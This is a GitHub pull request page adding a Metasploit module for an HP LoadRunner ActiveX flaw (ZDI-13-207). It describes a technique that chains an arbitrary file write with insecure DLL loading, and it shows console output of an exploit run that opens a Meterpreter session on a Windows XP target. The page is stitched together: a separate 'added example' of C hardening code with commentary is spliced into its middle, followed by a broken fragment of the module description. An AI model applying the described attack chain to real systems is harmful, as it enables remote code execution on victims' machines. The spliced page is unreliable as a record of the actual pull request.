Add module for ZDI-13-207 #2305

Merged
merged 2 commits into from Aug 30, 2013

Conversation

jvazquez-r7 (Contributor)

Tested with HP LoadRunner 11.50 on IE8 with Windows XP.

The vulnerability is an abuse of the WriteFileString API to write arbitrary files.

The module uses the vulnerability to drop a payload embedded in a DLL and abuses another ActiveX control API which loads an app library (LoadLibrary) in an insecure fashion. The good thing about this method is that it allows exploiting Windows XP even when no admin user visits the page (limitation of the WBem technique). The bad thing is that it doesn't work on Windows Vista / Windows 7 because IE runs in a Low Privileged Process and files are written to a virtualized directory, which isn't used by LoadLibrary anymore. Still, it is an interesting module to have in the framework, I think.

[*] 10.6.0.165       hp_loadrunner_writefilestring - Requesting: /AJGKasLzH5WQ
[*] 10.6.0.165       hp_loadrunner_writefilestring - Sending HTML...
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:50673) at 2013-08-29 14:08:29 -0500
[*] New session... remember to delete LrWeb2MdrvLoader.dll

msf exploit(hp_loadrunner_writefilestring) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: JUAN-C0DE875735\unprivileged
meterpreter > help
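The two primitives the pull request describes, an arbitrary file write and a library load by bare name, become code execution only because the bare name is resolved through the DLL search order (application directory, system directories, current directory, PATH): whichever of those directories the attacker can write to wins. The following is an added example, not code from this pull request or from the LoadRunner control: a C helper that refuses any library name carrying a path and joins it to a directory only administrators can write, shown beside the insecure and the hardened LoadLibrary call. TRUSTED_DIR and the function names are assumptions for illustration, not the real LoadRunner install path; only the two functions under `#ifdef _WIN32` call the real LoadLibrary APIs, so the helper builds and tests on any platform.

```c
/*
 * Added example (not from the pull request or the HP LoadRunner code):
 * an insecure LoadLibrary call beside a hardened one.
 *
 * A bare name handed to LoadLibrary walks the DLL search order, so a DLL
 * planted in any writable directory on that list gets loaded. The
 * hardened version only loads from one administrator-only directory and
 * never lets the caller supply a path of its own.
 *
 * TRUSTED_DIR is an assumed example directory, not a real install path.
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#ifdef _WIN32
#include <windows.h>
#endif

#define TRUSTED_DIR "C:\\Program Files\\Vendor\\bin"  /* assumed, example only */

/* Reject anything that already carries a path or could escape the trusted
 * directory: separators, drive letters, "." and "..", empty names.
 * Returns 0 and writes the absolute path into out on success, -1 otherwise. */
int build_trusted_path(const char *base_dir, const char *name,
                       char *out, size_t out_len)
{
    size_t need;

    if (name == NULL || *name == '\0')
        return -1;
    if (strchr(name, '\\') || strchr(name, '/') || strchr(name, ':'))
        return -1;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0)
        return -1;

    need = strlen(base_dir) + 1 + strlen(name) + 1;   /* base + '\' + name + NUL */
    if (need > out_len)
        return -1;

    snprintf(out, out_len, "%s\\%s", base_dir, name);
    return 0;
}

#ifdef _WIN32
/* Insecure: a bare name is resolved through the search order, so a DLL
 * dropped by an arbitrary-file-write primitive can be the one that loads. */
HMODULE load_insecure(const char *name)
{
    return LoadLibraryA(name);
}

/* Hardened: absolute path under an administrator-only directory, and the
 * current directory and PATH are excluded when the loader resolves the
 * DLL's own imports. The directory itself must stay non-writable by the
 * users who can reach the control, or the absolute path buys nothing. */
HMODULE load_hardened(const char *name)
{
    char path[MAX_PATH];

    if (build_trusted_path(TRUSTED_DIR, name, path, sizeof path) != 0)
        return NULL;
    return LoadLibraryExA(path, NULL, LOAD_LIBRARY_SEARCH_DEFAULT_DIRS);
}
#endif

int main(void)
{
    char path[512];
    const char *names[] = { "LrWeb2MdrvLoader.dll", "..\\LrWeb2MdrvLoader.dll",
                            "C:\\Temp\\evil.dll", "" };
    size_t i;

    for (i = 0; i < sizeof names / sizeof names[0]; i++) {
        if (build_trusted_path(TRUSTED_DIR, names[i], path, sizeof path) == 0)
            printf("accept  \"%s\" -> %s\n", names[i], path);
        else
            printf("reject  \"%s\"\n", names[i]);
    }
    return 0;
}
```

The helper is what makes the hardened call safe to expose from a scriptable control: the caller can choose a module name but never a directory. Note the limit the pull request itself points out from the other side: on Vista and 7 the low-integrity IE write lands in the virtualized directory rather than the real one, so the planted file is never on the search path at all, whereas on XP any user's write is the real write, and an absolute path only helps if that directory is not writable by that user.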


embedded in a dll, which is later loaded through the Init() method from the
lrMdrvService control, by abusing an insecure LoadLibrary call. This module has
been tested successfully on IE8 on Windows XP. Virtualization based on the Low
Integrity Process, on Windows Vista and 7, will stop this stop this module because
zeroSteiner (Contributor)


"will stop this stop this module" seems like a minor typo

jvazquez-r7 (Contributor, Author)


agree, thanks @zeroSteiner , fixing!

@wchen-r7 wchen-r7 merged commit 657be3a into rapid7:master Aug 30, 2013
@jvazquez-r7 jvazquez-r7 deleted the zdi_13_207 branch November 18, 2014 15:59